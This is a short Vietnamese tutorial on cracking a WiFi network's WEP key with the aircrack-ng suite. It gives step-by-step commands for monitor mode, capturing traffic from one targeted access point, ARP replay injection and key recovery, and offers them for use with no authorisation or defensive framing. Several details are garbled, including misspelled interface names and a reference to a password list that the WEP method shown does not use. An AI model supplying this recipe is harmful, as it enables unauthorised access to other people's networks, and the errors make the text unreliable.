Cách crack mật khẩu WiFi với Aircrack-Ng

Bước 1: Thiết lập adapter Wi-Fi ở chế độ Monitor Mode với Airmon-Ng

Nó cho phép nhìn thấy tất cả các lưu lượng không dây đi qua. Hãy mở cửa số Terminal
và gõ:
airmon-ng check kill all
airmon-ng start wlan0

Lưu ý: airmon-ng đổi tên adapter wlan0 thành wlan0won

Bước 2: Lấy thông tin traffic với Airodump-Ng

Bây giờ adapter không dây ở chế độ Monitor mode, do đó có thể nhìn thấy tất cả traffic
không dây đi qua. Lấy thông tin traffic bằng cách sử dụng lệnh airodump-ng.
Lệnh này sẽ lấy tất cả traffic mà adapter không dây có thể nhìn thấy và hiển thị thông
tin quan trọng về nó như BSSID (địa chỉ MAC của AP), điện năng, số khung beacon, số
khung dữ liệu, kênh, tốc độ, mã hóa (nếu có), và cuối cùng là ESSID (SSID). Gõ lệnh
sau trong terminal:
airodump-ng wlan0mon
Lưu ý: tất cả các AP có thể nhìn thấy được liệt kê ở phần trên của màn hình và các
client được liệt kê ở phần dưới của màn hình.
Bước 3: Tập trung Airodump-Ng trên một điểm truy cập trên một kênh
Bước tiếp theo chúng ta nên tập trung vào một AP trên một kênh và thu thập dữ liệu
quan trọng từ đó. Để làm điều này cần BSSID và kênh, mở một cửa sổ Terminal khác
và gõ:
airodump-ng --bssid 68:FF:7B:87:E3:B4 -c 10 --write WEPcrack wlan0mon

 68:FF:7B:87:E3:B4 là BSSID của AP

 -c 10 là kênh mà AP đang hoạt động
 WEPcrack là tệp muốn viết
 Wlan0mon là adapter không dây

Bước 4: chạy aireplay-ng ở chế độ ARP request replay

aireplay-ng -3 -b 68:FF:7B:87:E3:B4 -h E0:DC:FF:C2:1B:A7 wlan0man

 68:FF:7B:87:E3:B4 là BSSID của AP

 E0:DC:FF:C2:1B:A7 là địa chỉ mac của card mạng dùng để tấn công
 Wlan0mon là adapter không dây
Bước 5: Chạy aircrack-ng để lấy key WEP

aircrack-ng WEPcrack-01.cap

 WEPcrack-01.cap là tên tệp viết trong lệnh airodump-ng

Quá trình này có thể tương đối chậm và tẻ nhạt. Tùy thuộc vào độ dài của danh sách mật
khẩu, bạn có thể phải chờ vài phút đến vài ngày. Khi mật khẩu được tìm thấy, nó sẽ xuất hiện
trên màn hình

Tài liệu tham khảo:

https://www.aircrack-ng.org/doku.php?id=simple_wep_crack